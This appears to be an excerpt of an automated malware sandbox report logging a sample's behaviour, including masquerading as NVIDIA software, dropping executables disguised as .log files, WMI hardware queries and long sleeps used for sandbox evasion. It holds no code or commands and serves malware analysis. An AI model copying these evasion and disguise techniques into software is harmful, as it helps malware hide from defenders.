                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeMemory allocated: 1B480000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1AA50000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: AB0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1A4C0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1380000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1AFB0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: D10000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 9B0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1A580000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: A00000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1A790000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 780000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1A520000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1600000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1B3D0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: E80000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 2960000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 26F0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeMemory allocated: 1A8E0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\HbFMikPW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeDropped PE file which has not been started: C:\Users\user\Desktop\AVNUZtIi.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\OOMCloya.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\NBjcEgcI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\UCVIiXUm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\fjyPCrNn.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\XOysNJXm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\TMLKnwYz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\PszJebvu.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\TxJtcnQc.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\DaiMBcDs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeDropped PE file which has not been started: C:\Users\user\Desktop\ShoatPdx.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\hxRHxlcT.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\zwfUdEOY.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\VAeASPIF.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\JOqdsLLu.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\DSPMVDWa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\JesvDTTS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\chLhgIIs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\oSRflUSV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\xYhnoKfH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\JfykNhTG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\pAbpDGmk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\skLfaCLK.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\TAxSAtpp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\AAjFTaDk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\snUoPbCy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\CTevJfQr.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\gzqzblNZ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeDropped PE file which has not been started: C:\Users\user\Desktop\IyVKJmYP.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\ukwwlbRt.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\qiYwETGO.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\IMSbQhuH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\cjQhkVuX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\BlhnJSvN.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\LxmktYfY.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeDropped PE file which has not been started: C:\Users\user\Desktop\GwjbnDUU.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\XwgSVREI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\AOEnQqnj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\DnVLkBOS.logJump to dropped file
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23841
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe TID: 4564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1476Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6204Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1276Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1488Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6516Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 5964Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2228Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 320Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 3636Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 3276Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6720Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4092Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4476Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1268Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4024Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4080Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6768Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2228Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
